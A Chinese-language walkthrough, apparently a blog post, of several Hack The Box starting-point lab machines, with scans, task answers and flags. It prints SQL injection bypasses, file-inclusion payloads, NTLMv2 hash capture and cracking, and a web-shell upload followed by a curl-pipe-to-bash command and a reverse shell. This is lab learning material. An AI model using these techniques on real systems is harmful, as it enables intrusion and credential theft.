在打靶机的这几天,我觉得真的很舒服不知道为什么,在查阅资料的时候,多的是一种精神上的喜悦,单是回归主题,这个实验室的内容还是还不错的,学的小知识点其实还不错,怎么说呢国外的氛围是真的比国内好太多了
1. 信息收集
这里的话,小tips(扫端口和其他的操作分开,不然很慢) ,这里只有确定到 80 端口是开放的
└─# nmap -p- -T5 10.129.114.24 Nmap done: 1 IP address (1 host up) scanned in 316.86 seconds
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-06 15:47 CST
Warning: 10.129.114.24 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.129.114.24
Host is up (0.26s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
7445/tcp filtered unknown
56302/tcp filtered unknown
2. 题目
TASK 1What does the acronym SQL stand for?
Structured Query Language(SQL 的全称)
TASK 2What is one of the most common type of SQL vulnerabilities?
SQL Injection(SQL 注入)
TASK 3What does PII stand for?
personally identifiable information(个人验证信息)
TASK 4What does the OWASP Top 10 list name the classification for this vulnerability?
A03:2021-Injection(top10 的SQL注入)
TASK 5What service and version are running on port 80 of the target?
Apache httpd 2.4.38 ((Debian))(系统和程序的版本信息)
在上面的namp扫描中探测出版本信息
TASK 6What is the standard port used for the HTTPS protocol?
443(HTTPS 的默认端口)
TASK 7What is one luck-based method of exploiting login pages?
brute-forcing(暴力破解)
TASK 8What is a folder called in web-application terminology?
directory(这个就是目录的意思)
TASK 9What response code is given for "Not Found" errors?
404(404就是页面不执行,无响应)
TASK 10What switch do we use with Gobuster to specify we're looking to discover directories, and not subdomains?
dir(dir 是 Gobuster 扫目录的参数 )
TASK 11What symbol do we use to comment out parts of the code?
#(这个的话是可以注释SQL代码执行)
SUBMIT FLAG
Submit root flag
e3d0796d002a446c0e622226f42e9672
这里很明显就是SQL注入,我们尝试一下,遇到登录框,准备一下 fuzz ,跑一下万能密码,当前题目就是万能密码admin'#,我们可以看到他的SQL查询是存在逻辑漏洞的
mysql_connect("localhost", "db_username", "db_password"); # Connection to the SQL
Database.
mysql_select_db("users"); # Database table where user information is stored.
$username=$_POST['username']; # User-specified username.
$password=$_POST['password']; #User-specified password.
$sql="SELECT * FROM users WHERE username='$username' AND password='$password'";
# Query for user/pass retrieval from the DB.
$result=mysql_query($sql);
# Performs query stored in $sql and stores it in $result.
$count=mysql_num_rows($result);
# Sets the $count variable to the number of rows stored in $result.
if ($count==1){
# Checks if there's at least 1 result, and if yes:
$_SESSION['username'] = $username; # Creates a session with the specified $username.
$_SESSION['password'] = $password; # Creates a session with the specified $password.
header("location:home.php"); # Redirect to homepage.
}
else { # If there's no singular result of a user/pass combination:
header("location:login.php");
# No redirection, as the login failed in the case the $count variable is not equal to
1, HTTP Response code 200 OK.
}
?>
Appointment.pdf
1. 信息收集
这里进行基础的信息收集,发现只开了一个端口 3306数据库的端口
└─# nmap -sS -sV -T5 -A 10.129.114.89 TRACEROUTE (using port 21/tcp) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-06 20:24 CST
Nmap scan report for 10.129.114.89
Host is up (0.26s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
3306/tcp open mysql?
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
| Thread ID: 65
| Capabilities flags: 63486
| Some Capabilities: ODBCClient, IgnoreSpaceBeforeParenthesis, LongColumnFlag, SupportsLoadDataLocal, DontAllowDatabaseTableColumn, ConnectWithDatabase, Speaks41ProtocolNew, FoundRows, SupportsCompression, Speaks41ProtocolOld, Support41Auth, IgnoreSigpipes, InteractiveClient, SupportsTransactions, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
| Status: Autocommit
| Salt: ;Y.x6?zl.?2y-sz0{>^C
|_ Auth Plugin Name: mysql_native_password
Aggressive OS guesses: Linux 5.0 - 5.4 (95%), Linux 5.0 (94%), Linux 5.4 (94%), HP P2000 G3 NAS device (93%), Linux 4.15 - 5.6 (93%), Linux 2.6.32 (92%), Infomir MAG-250 set-top box (92%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (92%), Linux 5.0 - 5.3 (92%), Ubiquiti AirOS 5.5.9 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
HOP RTT ADDRESS
1 260.87 ms 10.10.14.1
2 260.98 ms 10.129.114.89
Nmap done: 1 IP address (1 host up) scanned in 213.20 seconds
2. 题目
TASK 1What does the acronym SQL stand for?
Structured Query Language(SQL 的全称)
TASK 2During our scan, which port running mysql do we find?
3306(MySQL的默认端口)
TASK 3What community-developed MySQL version is the target running?
MariaDB(开发MySQL的团队)
TASK 4What switch do we need to use in order to specify a login username for the MySQL service?
-u(这个是指定用户名,-p 是密码)
TASK 5Which username allows us to log into MariaDB without providing a password?
root(默认管理员账号)
TASK 6What symbol can we use to specify within the query that we want to display everything inside a table?
*(查看所有内容)
TASK 7What symbol do we need to end each query with?
;(结束符号)
TASK 8SUBMIT FLAG
7b4bec00d1a39e3dd4e021ec3d915da8
└─# mysql -h 10.129.114.89 -u root Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MariaDB [(none)]> show databases; MariaDB [(none)]> use htb; Database changed MariaDB [htb]> select * from config; MariaDB [htb]>
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 74
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10
+--------------------+
| Database |
+--------------------+
| htb |
| information_schema |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0.315 sec)
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
MariaDB [htb]> show tables;
+---------------+
| Tables_in_htb |
+---------------+
| config |
| users |
+---------------+
2 rows in set (0.312 sec)
+----+-----------------------+----------------------------------+
| id | name | value |
+----+-----------------------+----------------------------------+
| 1 | timeout | 60s |
| 2 | security | default |
| 3 | auto_logon | false |
| 4 | max_size | 2M |
| 5 | flag | 7b4bec00d1a39e3dd4e021ec3d915da8 |
| 6 | enable_uploads | false |
| 7 | authentication_method | radius |
+----+-----------------------+----------------------------------+
7 rows in set (0.313 sec)
Sequel.pdf
1. 信息收集
这里进行基础的信息收集,开启了 ftp 匿名登录,然后还有一个 80 端口
└─# nmap -sS -sV -T5 -A 10.129.114.94 TRACEROUTE (using port 554/tcp) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-06 22:06 CST
Warning: 10.129.114.94 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.129.114.94
Host is up (0.27s latency).
Not shown: 955 closed tcp ports (reset), 43 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 33 Jun 08 2021 allowed.userlist
|_-rw-r--r-- 1 ftp ftp 62 Apr 20 2021 allowed.userlist.passwd
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.14.22
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Smash - Bootstrap Business Template
|_http-server-header: Apache/2.4.41 (Ubuntu)
Aggressive OS guesses: Linux 5.0 (95%), Linux 5.0 - 5.4 (95%), Linux 5.4 (94%), HP P2000 G3 NAS device (93%), Linux 4.15 - 5.6 (93%), Linux 5.3 - 5.4 (93%), Linux 2.6.32 (92%), Infomir MAG-250 set-top box (92%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (92%), Linux 3.7 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Unix
HOP RTT ADDRESS
1 269.69 ms 10.10.14.1
2 269.75 ms 10.129.114.94
Nmap done: 1 IP address (1 host up) scanned in 77.16 seconds
2. 题目
TASK 1What nmap scanning switch employs the use of default scripts during a scan?
-sC(nmap 使用默认扫描脚本)
TASK 2What service version is found to be running on port 21?
vsftpd 3.0.3(ftp的版本)
TASK 3What FTP code is returned to us for the "Anonymous FTP login allowed" message?
230(这个是登录成功的状态码)
TASK 4What command can we use to download the files we find on the FTP server?
get(这个是下载请求,其他命令可以 help 查看)
TASK 5What is one of the higher-privilege sounding usernames in the list we retrieved?
admin(这个是ftp下载的文件查看的用户名)
TASK 6What version of Apache HTTP Server is running on the target host?
2.4.41(http 的版本)
TASK 7What is the name of a handy web site analysis plug-in we can install in our browser?
wappalyzer(这个是浏览器的插件,查看框架的)
TASK 8What switch can we use with gobuster to specify we are looking for specific filetypes?
-x(gobuster 指定扫描目录)
TASK 9What file have we found that can provide us a foothold on the target?
login.php(扫描到突破点)
TASK 10SUBMIT FLAG
c7110277ac44d78b6a9fff2232434d16
这里的突破点在我们下载的ftp的目录里面数据进行登录即可
Crocodile.pdf
1. 信息收集
└─# nmap -sVC -T5 -Pn -p- 10.129.95.234 --min-rate 5000 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-07 19:35 CST
Nmap scan report for 10.129.95.234
Host is up (0.75s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
5985/tcp open tcpwrapped
Nmap done: 1 IP address (1 host up) scanned in 67.05 seconds
2. 题目
TASK 1
When visiting the web service using the IP address, what is the domain that we are being redirected to?
unika.htb(访问IP重定向域名)】
一般出现这种问题就可以马上反应绑定 hosts 进行访问
echo "10.129.114.174 unika.htb" | sudo tee -a /etc/hosts
TASK 2
Which scripting language is being used on the server to generate webpages?
php(网站由什么语言写的)
TASK 3
What is the name of the URL parameter which is used to load different language versions of the webpage?
page(当前网页接收其他数据的参数名词)
TASK 4
Which of the following values for the `page` parameter would be an example of exploiting a Local File Include (LFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"
../../../../../../../../windows/system32/drivers/etc/hosts(这个是 windows 的 hosts 文件;本地包含)
TASK 5
Which of the following values for the `page` parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"
//10.10.14.6/somefile(远程包含文件,这个 flag 是固定的)
这里的文件包含可以进行远程,像SMB这样的协议,Windows将尝试对我们的机器进行身份验证,我们可以捕获NetNTLMv2,可以看看下面这篇文章科普一下什么是 NTLM
纯干货-内网渗透系列教程——NTLM 与 NTLM 身份认证 - 知乎.pdf
TASK 6
What does NTLM stand for?
New Technology LAN Manager(名词)
Windows NT LAN Manager(NTLM)是用于Microsoft Windows NT 4.0的安全协议套件。NTLM取代了Windows LAN Manager(LANMAN)。NTLM用于下层客户端和服务器与Windows 2000的兼容性。
NTLM 被 Microsoft Kerberos取代。
TASK 7
Which flag do we use in the Responder utility to specify the network interface?
-I(Responder 的指定网卡参数)
git clone https://github.com/lgandx/Responder 下载链接,我们可以尝试加载 SMB URL,在这个过程中,我们可以使用 Responder 从目标获取哈希值,当目标计算机试图对该服务器 Responder 执行NTLM身份验证时向服务器发送一个请求,要求用用户的密码加密。当服务器响应时,响应者将使用质询和加密的响应来生成NetNTLMv2。虽然我们不能反转NetNTLMv2,我们可以尝试许多不同的常见密码,看看是否有任何生成相同的挑战-回应,如果我们找到了,就知道密码是什么了。这通常被称为散列破解,(监听抓包,跑彩虹表),就算他没有开启这个服务,他开启了文件包含,我们就可以伪造出这个协议,让他尝试的去连接我们,使得 Responder 抓到 hash,这里要开启 smb
可以看到是抓到 hash 的,然后我们进行 josh 破解即可
└─# python3 Responder.py -I tun0 NBT-NS, LLMNR & MDNS Responder 3.1.3.0 To support this project: Author: Laurent Gaffie ([email protected]) [+] Poisoners: [+] Servers: [+] HTTP Options: [+] Poisoning Options: [+] Generic Options: [+] Current Session Variables: [+] Listening for events... [SMB] NTLMv2-SSP Client : 10.129.95.234
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
To kill this script hit CTRL-C
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
Responder NIC [tun0]
Responder IP [10.10.14.22]
Responder IPv6 [dead:beef:2::1014]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
Responder Machine Name [WIN-UKROAR57I3C]
Responder Domain Name [5AK0.LOCAL]
Responder DCE-RPC Port [49241]
[SMB] NTLMv2-SSP Username : RESPONDER\Administrator
[SMB] NTLMv2-SSP Hash : Administrator::RESPONDER:c219b086bf5ee7a6:10F1084119C59C1B8CBD3E1E90F28341:01010006638C21CA320000000002000800350041004B00300001001E00570049004E002D0055004B0052004F00410052003500370049003300430B0052004F0041005200350037004900330043002E00350041004B0030002E004C004F00430041004C0003001400350041004B0030002E050041004B0030002E004C004F00430041004C000700080080A0D328FAC2D801060004000200000008003000300000000000000001000007B7270389D9B123FFAA610E903283A63F8752C16B300A001000000000000000000000000000000000000900200063006900660073002F04002E00320032000000000000000000
[+] Exiting...
可以看到跑出来的密码是:badminton
-w : wordlist to use for cracking the hash
john -w=/usr/share/wordlists/rockyou.txt hash
└─# gunzip /usr/share/wordlists/rockyou.txt.gz
└─# john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
badminton (Administrator)
1g 0:00:00:00 DONE (2022-09-07 21:08) 100.0g/s 409600p/s 409600c/s 409600C/s slimshady..oooooo
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
TASK 8
There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as `john`, but the full name is what?.
John The Ripper(名词)
TASK 9
What is the password for the administrator user?
badminton(用户的密码)
TASK 10
We'll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?
5985(信息收集上面有)
TASK 11Submit root flag
ea81b7afddd03efaa0945333ed147fac
我们将连接到目标上的WinRM服务,并尝试获得一个会话。因为没有安装PowerShell,在Linux上,默认情况下,我们将使用一个名为 Evil-WinRM 的工具,它就是为这种情况而设计的,win 系统使用 type 查看文件
└─# evil-winrm -i 10.129.95.234 -u administrator -p badminton Evil-WinRM shell v3.3 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> dir Directory: C:\Users Mode LastWriteTime Length Name *Evil-WinRM* PS C:\Users> cd mike Directory: C:\Users\mike Mode LastWriteTime Length Name *Evil-WinRM* PS C:\Users\mike> cd desktop
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd
*Evil-WinRM* PS C:\Users\Administrator> cd ..
*Evil-WinRM* PS C:\Users> dir
---- ------------- ------ ----
d----- 3/9/2022 5:35 PM Administrator
d----- 3/9/2022 5:33 PM mike
d-r--- 10/10/2020 12:37 PM Public
*Evil-WinRM* PS C:\Users\mike> dir
tyo
---- ------------- ------ ----
d----- 3/10/2022 4:51 AM Desktop
*Evil-WinRM* PS C:\Users\mike\desktop> type flag.txt
ea81b7afddd03efaa0945333ed147fac
*Evil-WinRM* PS C:\Users\mike\desktop>
Responder.pdf
1. 信息收集
└─# nmap -sVC -T5 -Pn -p- -O -open 10.129.115.208 --min-rate 5000 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-08 10:49 CST
Nmap scan report for 10.129.115.208
Host is up (0.26s latency).
Not shown: 65532 closed tcp ports (reset), 1 filtered tcp port (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 17:8b:d4:25:45:2a:20:b8:79:f8:e2:58:d7:8e:79:f4 (RSA)
| 256 e6:0f:1a:f6:32:8a:40:ef:2d:a7:3b:22:d1:c7:14:fa (ECDSA)
|_ 256 2d:e1:87:41:75:f3:91:54:41:16:b7:2b:80:c6:8f:05 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: The Toppers
|_http-server-header: Apache/2.4.29 (Ubuntu)
Aggressive OS guesses: Linux 5.0 (95%), Linux 5.0 - 5.4 (95%), Linux 5.4 (94%), HP P2000 G3 NAS device (93%), Linux 4.15 - 5.6 (93%), Linux 5.3 - 5.4 (93%), Linux 2.6.32 (92%), Linux 5.0 - 5.3 (92%), Linux 5.1 (92%), Ubiquiti AirOS 5.5.9 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap done: 1 IP address (1 host up) scanned in 38.70 seconds
2. 题目
TASK 1How many TCP ports are open?
2(有2个端口的连接)
扫描显示有两个端口是开放的—端口80 (HTTP)和端口22 (SSH)
TASK 2
What is the domain of the email address provided in the "Contact" section of the website?
thetoppers.htb(在网页端信息收集)
一般拿到这种类似域名的东西,我们就可以进行添加 hosts 进行绑定,尝试一下是否可以进行解析域名,从而扩大危害,找到其他的突破点 echo "10.129.227.248 thetoppers.htb" | sudo tee -a /etc/hosts,
TASK 3In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?
/etc/hosts(修改配置的文件存放地址)
TASK 4Which sub-domain is discovered during further enumeration?
s3.thetoppers.htb(存储桶的域名)
这里的话我们就可以进行一下枚举,这里的话,官方推荐使用 gobuster (kali 自带的版本不对,有部分差别,建议使用最新版本)这里我跑了2个类型(dir、vhost),其他参数在他的 github 可以查看
└─# gobuster -m dir -u http://thetoppers.htb/ -w /usr/share/wordlists/dirb/common.txt =====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://thetoppers.htb/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
2022/09/08 13:59:54 Starting gobuster
=====================================================
/.htaccess (Status: 403)
/.hta (Status: 403)
/.htpasswd (Status: 403)
/images (Status: 301)
/index.php (Status: 200)
/server-status (Status: 403)
=====================================================
2022/09/08 14:02:14 Finished
=====================================================
这里的话就是他的其他的域名,这里跑出了2个(字典),aws 是云服务,s3 这个域名是默认存储桶,我们要把他的域名绑定为 hosts即可进行访问
└─# ./gobuster vhost -w /root/桌面/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb/
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://thetoppers.htb/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /root/桌面/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/09/08 15:20:13 Starting gobuster in VHOST enumeration mode
===============================================================
Found: s3.thetoppers.htb (Status: 404) [Size: 21]
Found: gc._msdcs.thetoppers.htb (Status: 400) [Size: 306]
===============================================================
2022/09/08 15:22:29 Finished
===============================================================
TASK 5Which service is running on the discovered sub-domain?
amazon s3(亚马逊的服务)
查看一下他们的请求头就可以发现这个是亚马逊的请求
└─# nikto -host http://s3.thetoppers.htb/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.129.115.186
+ Target Hostname: s3.thetoppers.htb
+ Target Port: 80
+ Start Time: 2022-09-08 17:06:33 (GMT8)
---------------------------------------------------------------------------
+ Server: hypercorn-h11
+ Retrieved access-control-allow-origin header: *
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-amzn-requestid' found, with contents: 5BW2HNEGIK8KW7WX0WUXYQI07QLGQW0XOIB08PGKXW37IGPF6YBL
+ Uncommon header 'x-amz-request-id' found, with contents: A14FC52534975C6E
+ Uncommon header 'x-amz-id-2' found, with contents: MzRISOwyjmnupA14FC52534975C6E7/JypPGXLh0OVFGcJaaO3KW/hRAqKOpIEEp
TASK 6Which command line utility can be used to interact with the service running on the discovered sub-domain?
awscli(使用什么与储蓄桶交互)
kali 没有自带 aws 服务界面,我们需要自己另外安装
curl "https://s3.amazonaws.com/aws-cli/awscli-bundle.zip" -o "awscli-bundle.zip"
unzip awscli-bundle.zip
sudo ./awscli-bundle/install -i /usr/local/aws -b /usr/local/bin/aws
TASK 7Which command is used to set up the AWS CLI installation?
aws configure(配置 aws 服务)
当我们知道有突破点的时候,我们就需要进行与突破点进行交互,有些 aws 的秘钥默认他没有进行校验,所以我们将为所有字段使用任意值,因为有时服务器被配置为不检查,身份验证(仍然必须配置为aws才能工作)。
─# aws configure
AWS Access Key ID [None]: demo
AWS Secret Access Key [None]: demo
Default region name [None]: demo
Default output format [None]: demo
然后我们就可以进行与储蓄桶进行交互,他的操作和我们的 bash 类似,可以看到我们 ls 查看 s3 托管的 bucket
└─# aws --endpoint=http://s3.thetoppers.htb s3 ls
2022-09-08 15:03:23 thetoppers.htb
TASK 8What is the command used by the above utility to list all of the S3 buckets?
aws s3 ls(配置 aws 服务)
└─# tldr aws s3 aws s3 CLI for AWS S3 - provides storage through web services interfaces. - Show files in a bucket: - Sync files and directories from local to bucket: - Sync files and directories from bucket to local: - Sync files and directories with exclusions: - Remove file from bucket: - Preview changes only:
More information: https://awscli.amazonaws.com/v2/documentation/api/latest/reference/s3/index.html.
aws s3 ls bucket_name
aws s3 sync path/to/files s3://bucket_name
aws s3 sync s3://bucket_name path/to/target
aws s3 sync path/to/files s3://bucket_name --exclude path/to/file --exclude path/to/directory/*
aws s3 rm s3://bucket/path/to/file
aws s3 any_command --dryrun
可以看到这里的 buckets 和我们上面信息收集的是一样的,所以Apache服务器使用这个S3桶作为存储桶
┌──(root㉿Tom)-[~/桌面]
└─# aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb
PRE images/
2022-09-08 15:03:23 0 .htaccess
2022-09-08 15:03:24 11952 index.php
TASK 9This server is configured to run files written in what web scripting language?
PHP(PHP语言的框架)
TASK 10SUBMIT FLAG
a980d99281a28d638ac68b9bf9453c2b
Awscli还有另一个特性,它允许我们将文件复制到远程存储桶。我们已经知道网站使用PHP。因此,我们可以尝试上传一个PHP shell 文件到 S3 桶,因为它已经上传到我们可以在浏览器中访问这个网页的 webroot 目录,它将依次执行这个文件和我们将实现远程代码执行,我们可以使用下面的PHP一行代码,它使用了接受URL参数的system()函数CMD作为输入,并作为系统命令执行
┌──(root㉿Tom)-[~/桌面]
└─# aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb
PRE images/
2022-09-08 19:45:31 0 .htaccess
2022-09-08 19:45:32 11952 index.php
┌──(root㉿Tom)-[~/桌面]
└─# aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb
upload: ./shell.php to s3://thetoppers.htb/shell.php
然后我们就可以命令执行
https://www.thetoppers.htb/shell.php?cmd=curl%20http://10.10.14.22:8989/1.sh|bash,这里要另外开一个服务器,让你的 paylaod 执行,这个的话,我们使用无交互的执行shell,或者使用 post 接收的 exp,但是靶机有点卡
└─# nc -lnvp 8979
listening on [any] 8979 ...
connect to [10.10.14.22] from (UNKNOWN) [10.129.116.24] 38874
bash: cannot set terminal process group (1500): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:/home$ cat /var/www/flag.txt
cat /var/www/flag.txt
a980d99281a28d638ac68b9bf9453c2b
Three.pdf
1.信息收集
└─# nmap -sVC -T5 -Pn -p- -O -open 10.129.1.27 --min-rate 5000 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-08 21:33 CST
Nmap scan report for 10.129.1.27
Host is up (0.26s latency).
Not shown: 63770 closed tcp ports (reset), 1764 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.14.2
|_http-title: Did not follow redirect to http://ignition.htb/
|_http-server-header: nginx/1.14.2
Aggressive OS guesses: HP P2000 G3 NAS device (93%), Linux 5.0 (91%), Linux 5.4 (91%), Linux 3.1 (91%), Linux 3.2 (91%), Linux 5.0 - 5.4 (91%), OpenWrt Kamikaze 7.09 (Linux 2.6.22) (91%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (91%), Asus RT-AC66U router (Linux 2.6) (90%), Asus RT-N16 WAP (Linux 2.6) (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Nmap done: 1 IP address (1 host up) scanned in 37.96 seconds
2.信息收集
TASK 1Which service version is found to be running on port 80?
nginx 1.14.2(这个中间件在运行)
TASK 2What is the 3-digit HTTP status code returned when you visit http://{machine IP}/?
302(重定向)
TASK 3What is the 3-digit HTTP status code returned when you visit http://{machine IP}/?
ignition.htb(绑定域名)
TASK 4What is the full path to the file on a Linux computer that holds a local list of domain name to IP address pairs?
/etc/hosts(绑定域名)
TASK 5What is the full URL to the Magento login page?
http://ignition.htb/admin(绑定域名)
下次遇到没有突破口的时候,我们可以继续扩展攻击面,进行信息收集,下次flag不对,跑一下相关的工具
└─# ./gobuster dir -w /root/桌面/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://ignition.htb
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://ignition.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /root/桌面/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/09/09 10:18:56 Starting gobuster in directory enumeration mode
===============================================================
/home (Status: 200) [Size: 25802]
/contact (Status: 200) [Size: 28673]
/media (Status: 301) [Size: 185] [--> http://ignition.htb/media/]
/0 (Status: 200) [Size: 25803]
/catalog (Status: 302) [Size: 0] [--> http://ignition.htb/]
/static (Status: 301) [Size: 185] [--> http://ignition.htb/static/]
/admin (Status: 200) [Size: 7095]
/Home (Status: 301) [Size: 0] [--> http://ignition.htb/home]
/cms (Status: 200) [Size: 25817]
TASK 6What password provides access as admin to Magento?
qwerty123(绑定域名)
打靶场会被局限思维,这让我很难受,既然这个 Magento 是个有名的 CMS 那就当然有他的开发文档或者技术文档,我们就可以在这些文档获取一些默认密码或者其他有用的突破信息
这里我们找到他的 技术文档 ,我们就可以知道,爆破是没有用的,所以我们得换个方向进行突破
这里我们就去找一下 2022 的 top 10 的密码 ,然后对技术文档的规则进行筛选(qwerty123)
TASK 7Submit root flag
797d6c988d9dc5865e010b9410f247e0
这里我们登录了后台就可以拿到 flag
Ignition.pdf
1.信息收集
└─# nmap -sVC -T5 -Pn -p- -O -open 10.129.116.144 --min-rate 5000 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-09 11:12 CST
Nmap scan report for 10.129.116.144
Host is up (0.25s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http Node.js (Express middleware)
